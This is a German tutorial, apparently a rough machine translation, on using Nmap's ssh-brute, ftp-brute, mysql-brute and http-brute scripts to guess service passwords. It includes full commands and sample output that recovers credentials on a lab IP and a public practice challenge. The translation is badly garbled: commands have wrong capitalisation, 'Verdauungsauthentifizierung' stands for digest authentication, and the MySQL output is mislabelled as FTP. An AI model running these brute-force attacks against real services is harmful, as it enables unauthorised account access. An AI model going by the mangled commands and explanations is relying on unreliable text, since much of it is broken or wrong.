Passwort Brute-Forcing mit NMAP

Passwort Brute-Forcing mit NMAP
Für Brute-Force-Online-Dienste verwenden Menschen normalerweise Hydra, Medusa und Metasploit-Framework, aber NMAP kann auch verwendet werden, um viele Online-Dienste zu brüten. Es gibt integrierte NMAP-Skripte, die FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP und andere verschiedene Dienste unterstützen. Sie können auch brate-force http-basierte, grundlegende und Verdauungsauthentifizierungsmethoden. Wenn Sie NMAP installiert haben, können Sie diese Skripte im Verzeichnis „/usr/share/nmap/scripts“ sehen.
Ubuntu@Ubuntu: ~ $ sudo APT Update && sudo APT -Upgrade
Ubuntu@Ubuntu: ~ $ sudo APT install nmap -y
Ubuntu@ubuntu: ~ $ cd/usr/share/nmap/scripts/
Ubuntu@Ubuntu: ~ $ ls *brotes *

In diesem Tutorial werden wir untersuchen, wie wir NMAP für einen Brute-Force-Angriff verwenden können.

SSH Brute-Force

SSH ist ein sicheres Remote -Administrationsprotokoll und unterstützt OpenSSL & Passwortbasierte Authentifizierung. Um SSH-basierte Authentifizierung von SSH-basiertem Force-Force-basierend zu machen, können wir „SSH-Brute verwenden.NSE ”NMAP -Skript.

Ubuntu@ubuntu:/usr/shar Share/nmap/script/$ ls*ssh*brate*
SSH-Brute.NSE

Übergeben Sie Benutzername und Passwortliste als Argument an NMAP.

Ubuntu@Ubuntu: ~ $ nmap --Script SSH -Brute -p22 192.168.43.181
--Skript-Args userdb = Benutzer.TXT, PassDB = Passwörter.txt
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 17:09 PKT
NMAP -Scanbericht für 192.168.43.181
Host ist auf (0.00033s Latenz).
Port State Service
22/TCP Open SSH
| SSH-Brute:
| Konten:
| Admin: P4SSW0RD - Gültige Anmeldeinformationen
| _ Statistik: 99 Vermutungen in 60 Sekunden durchgeführt, durchschnittlich TPS: 1.7
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 60.17 Sekunden

FTP Brute-Force

FTP ist ein Dateiübertragungsprotokoll, das die kennwortbasierte Authentifizierung unterstützt. Um die Brute-Force-FTP zu erhalten, werden wir „FTP-Brute verwenden.NSE ”NMAP -Skript.

Ubuntu@ubuntu:/usr/share/nmap/script/$ ls*ftp*brate*
FTP-Brute.NSE

Übergeben Sie Benutzername und Passwortliste als Argument an NMAP.

Ubuntu@Ubuntu: ~ $ nmap --Script ftp -brute -p21 192.168.43.181-Skript-Args
userDB = Benutzer.TXT, PassDB = Passwörter.txt
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 16:51 PKT
NMAP -Scanbericht für 192.168.43.181
Host ist auf (0.00021s Latenz).
Port State Service
21/TCP Open FTP
| FTP-Brute:
| Konten:
| Admin: P4SSW0RD - Gültige Anmeldeinformationen
| _ Statistik: 99 Vermutungen in 20 Sekunden, durchschnittlich TPS: 5 durchgeführt.0
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 19.50 Sekunden

Mysql Brute-Force

Manchmal bleibt MySQL für externe Verbindungen offen und ermöglicht es jedem, sich darauf zu verbinden. Das Passwort kann mit NMAP mit "MySQL-Brute" -Skript geknackt werden.

Ubuntu@Ubuntu: ~ $ sudo nmap --Script MySQL -Brute -p3306 192.168.43.181
--Skript-Args userdb = Benutzer.TXT, PassDB = Passwörter.txt
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 16:51 PKT
NMAP -Scanbericht für 192.168.43.181
Host ist auf (0.00021s Latenz).
Port State Service
3306/TCP Open MySQL
| FTP-Brute:
| Konten:
| Admin: P4SSW0RD - Gültige Anmeldeinformationen
| _ Statistik: 99 Vermutungen in 20 Sekunden, durchschnittlich TPS: 5 durchgeführt.0
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 19.40 Sekunden

Http Brute-Force

HTTP verwendet drei Arten von Authentifizierung, um Benutzer mit Webservern zu authentifizieren. Diese Methoden werden in Routern, Modems und erweiterten Webanwendungen verwendet, um Benutzernamen und Passwörter auszutauschen. Diese Typen sind:

Grundlegende Authentifizierung

In HTTP Basic Authentication Protocol codiert Browser Benutzername und Kennwort mit Base64 und sendet es unter "Autorisierungs" -Header. Sie können dies im folgenden Screenshot sehen.

Autorisierung: Basic ywrtaw46ywrtaw4 =

Sie können diese Zeichenfolge base64 dekodieren, um den Benutzernamen und das Passwort zu sehen

Ubuntu@Ubuntu: ~ $ echo ywrtaw46ywrtaw4 = | Base64 -d
admin: admin

Die grundlegende Authentifizierung von HTTP ist unsicher, da sie sowohl den Benutzernamen als auch das Passwort im Klartext sendet. Jeder Man-in-the-Middle-Angreifer kann den Verkehr problemlos abfangen und die Zeichenfolge dekodieren, um das Passwort zu erhalten.

Verdauungsauthentifizierung

Die HTTP -Digest -Authentifizierung verwendet Hashing -Techniken, um den Benutzernamen und das Passwort zu verschlüsseln, bevor Sie ihn an den Server senden.

Hash1 = MD5 (Benutzername: Realm: Passwort)
Hash2 = MD5 (Methode: Digesturi)
Antwort = MD5 (Hash1: Nonce: Noncount: Cnonce: QOP: Hash2)

Sie können diese Werte unter dem Header „Autorisierung“ sehen.

Digest -basierte Authentifizierung ist sicher, da das Passwort nicht in einfachem Text gesendet wird. Wenn ein Mann-in-the-Middle-Angreifer den Verkehr abfängt, kann er das Klartextkennwort nicht erhalten.

Formbasierte Authentifizierung

Grundlegende und Digest -Authentifizierungen unterstützen nur die Übertragung von Benutzername und Kennwort, während die formbasierte Authentifizierung basierend auf den Anforderungen des Benutzers angepasst werden kann. Sie können Ihre eigene Webseite auf HTML oder JavaScript erstellen, um Ihre eigenen Codierungs- und Transfertechniken anzuwenden.

Normalerweise werden Daten in formbasierter Authentifizierung in einfachem Text gesendet. Für Sicherheitsprobleme muss HTTPS angewendet werden, um MAN-in-the-Middle-Angriffe zu verhindern.

Wir können alle Arten von HTTP -Authentifizierung mit NMAP erzwingen. Wir werden das Skript "http-brute" zu diesem Zweck verwenden.

Ubuntu@ubuntu:/usr/shar Share/nmap/script/$ ls*http*brate*
http-brute.NSE

Um dieses NMAP-Skript zu testen, werden wir eine öffentlich gehostete Brute-Force-Herausforderung der Pentester Academy unter dieser URL http: // pentesteracademylab lösen.AppSpot.com/lab/webapp/basicAuth.

Wir müssen alles, einschließlich Hostname, URI, Anforderungsmethode und Wörterbücher, separat als Skriptargument anbieten.

Ubuntu@Ubuntu: ~ $ sudo nmap -p80 --Skript http -brute pentesteracademylab.AppSpot.com
--Skript-Args http-brute.Hostname = Pentesteracademylab.AppSpot.com,
http-brute.path =/lab/webapp/basicAuth, userDB = Benutzer.TXT, PassDB = Passwörter.txt,
http-brute.Methode = Post
NMAP 7 starten.70 (https: // nmap.org) um 2020-02-08 21:37 PKT
NMAP -Scanbericht für Pentesteracademylab.AppSpot.com (216.58.210.84)
Host ist auf (0.20s Latenz).
Andere Adressen für Pentesteracademylab.AppSpot.com (nicht gescannt): 2A00: 1450: 4018: 803 :: 2014
RDNS -Rekord für 216.58.210.84: MCT01S06-in-F84.1e100.Netz
Port State Service
80/TCP Open HTTP
| http-brute:
| Konten:
| admin: aaddd - gültige Anmeldeinformationen
| _ Statistik: 165 Vermutungen in 29 Sekunden durchgeführt, durchschnittlich TPS: 5.3
NMAP Fertig: 1 IP -Adresse (1 Host -Up) gescannt in 31.22 Sekunden

Abschluss

NMAP kann verwendet werden, um trotz einfach einfacher Port -Scan viele Dinge zu tun. Es kann Metasploit, Hydra, Medusa und viele andere Tools ersetzen. NMAP verfügt.